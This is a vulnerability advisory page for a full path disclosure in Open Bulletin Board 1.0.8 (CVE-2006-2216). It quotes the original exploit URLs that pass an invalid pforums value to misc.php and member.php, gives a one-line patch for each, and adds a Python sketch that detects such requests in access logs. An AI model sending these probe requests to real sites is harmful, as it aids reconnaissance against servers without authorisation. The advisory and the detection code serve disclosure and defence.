Open Bulletin Board Multiple Information Disclosure Vulnerabilities

Vulnerability ID: 1195114    Vulnerability type: Unknown
Published: 2006-05-05    Updated: 2006-05-05
CVE ID: CVE-2006-2216    CNNVD-ID: CNNVD-200605-086
Platform: N/A    CVSS score: 5.0
|Vulnerability sources
https://www.securityfocus.com/bid/87640
https://cxsecurity.com/issue/WLB-2006050042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-086
|Vulnerability details
Open Bulletin Board (OpenBB) 1.0.8 allows remote attackers to obtain the full web server path via an invalid pforums parameter to (1) misc.php and (2) member.php.
|Exploit
OpenBB 1.0.8 Full Path Disclosure

Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT

Rock Master

Hackers Pal

n0m3rcy

-= 1-2 =-

Full Path Disclosure

Exploits :-

/OpenBB/misc.php?action=latest&pforums=D3vil-0x1

/OpenBB/member.php?action=online&&pforums=D3vil-0x1

Fix It :-

misc.php

Add This Line To '36' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

-------------------------------------

member.php

Add This Line To '759' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]
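
A detection sketch for the requests described above, added here as an example and not part of the advisory or of OpenBB's own code. It assumes Common Log Format access logs and that legitimate clients never send `pforums` in the query string (the fix above discards any such value); the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory names as reachable with a request-supplied pforums value.
AFFECTED_SCRIPTS = ("misc.php", "member.php")

# Request portion of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up values).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/May/2006:10:00:00 +0000] "GET /OpenBB/misc.php?action=latest&pforums=abc HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/May/2006:10:00:02 +0000] "GET /OpenBB/member.php?action=online&&pforums%5B0%5D=abc HTTP/1.1" 200 498',
    '198.51.100.7 - - [05/May/2006:10:01:00 +0000] "GET /OpenBB/misc.php?action=latest HTTP/1.1" 200 2048',
    '198.51.100.7 - - [05/May/2006:10:01:05 +0000] "GET /OpenBB/index.php?pforums=abc HTTP/1.1" 200 1024',
]

def find_pforums_requests(log_lines):
    """Return (client, script, value) for each request to an affected
    script that carries a pforums parameter in its query string."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group("target"))
        script = url.path.rsplit("/", 1)[-1].lower()
        if script not in AFFECTED_SCRIPTS:
            continue
        # parse_qs percent-decodes names, so pforums%5B0%5D becomes pforums[0];
        # empty fields such as the one in "&&" are skipped.
        params = parse_qs(url.query, keep_blank_values=True)
        values = [v for name, vals in params.items()
                  if name == "pforums" or name.startswith("pforums[")
                  for v in vals]
        if values:
            client = line.split(" ", 1)[0]
            hits.append((client, script, values[0]))
    return hits

if __name__ == "__main__":
    for client, script, value in find_pforums_requests(SAMPLE_LOG):
        print(f"{client} sent pforums={value!r} to {script}")
```
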
|Affected products
Devsyn Open Bulletin Board 1.0.8
|References

Source: BUGTRAQ
Name: 20060428 OpenBB 1.0.8 Full Path Disclosure
Link: http://www.securityfocus.com/archive/1/archive/1/432592/100/0/threaded
Source: XF
Name: openbb-multiple-path-disclosure(26193)
Link: http://xforce.iss.net/xforce/xfdb/26193
Source: SREASON
Name: 845
Link: http://securityreason.com/securityalert/845